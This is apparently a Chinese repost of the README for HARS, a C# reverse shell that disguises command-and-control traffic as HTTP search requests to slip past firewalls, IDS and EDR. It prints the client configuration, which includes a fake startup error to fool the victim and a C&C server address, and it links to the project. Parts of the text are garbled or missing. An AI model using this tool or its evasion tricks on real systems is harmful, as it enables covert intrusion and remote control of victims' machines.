使用HTTP協(xié)議的異步反向Shell/反彈Shell
使用HTTP協(xié)議的異步反向Shell/反彈ShellHTTP異步反向Shell 有很多方法可以創(chuàng)建反向shell,以便能夠通過防火墻遠程控制計算機。確實,傳出連接并不總是被過濾。 但是,安全軟件和硬件(IPS,IDS,Proxy,AV,EDR等)功能越來越強大,可以檢測到這些攻擊
使用HTTP協(xié)議的異步反向Shell/反彈ShellHTTP異步反向Shell 有很多方法可以創(chuàng)建反向shell,以便能夠通過防火墻遠程控制計算機。確實,傳出連接并不總是被過濾。 但是,安全軟件和硬件(IPS,IDS,Proxy,AV,EDR等)功能越來越強大,可以檢測到這些攻擊
有很多方法可以創(chuàng)建反向shell,以便能夠通過防火墻遠程控制計算機。確實,傳出連接并不總是被過濾。
但是,安全軟件和硬件(IPS,IDS,Proxy,AV,EDR等)功能越來越強大,可以檢測到這些攻擊。在大多數(shù)情況下,通過TCP或UDP隧道建立與反向Shell的連接。我認為最好的檢測方法是使它看起來像合法流量。HTTP協(xié)議是標準用戶最常使用的協(xié)議。而且,它幾乎從未被過濾,以免阻止訪問網(wǎng)站。
然后:
依此類推,直到攻擊者決定結(jié)束會話為止。
實現(xiàn)了以下功能:
有一些配置參數(shù)可以在HARS.sln中的Config.cs修改。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | class Config ????{ ????????/* Behavior */ ????????// Display a fake error msg at startup ????????public static bool DisplayErrorMsg = true; ????????// Title of fake error msg ????????public static string ErrorMsgTitle = "This application could not be started."; ????????// Description of fake error msg ????????public static string ErrorMsgDesc = "Unhandled exception has occured in your application. rr Object {0} is not valid."; ????????// Min delay between the client calls ????????public static int MinDelay = 2; ????????// Max delay between the client calls ????????public static int MaxDelay = 5; ????????// Fake uri requested - Warning : it must begin with "search" (or need a change on server side) ????????public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid="; ????????/* Listener */ ????????// Hostname/IP of C&C server ????????public static string Server = "https://127.0.0.1"; ????????// Listening port of C&C server ????????public static string Port = "443"; ????????// Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy ????????public static bool AllowInsecureCertificate = true; ????} |
更多文檔直接看項目說明。
項目地址:https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
版權(quán)所有:深圳市網(wǎng)商在線科技有限公司
友情鏈接: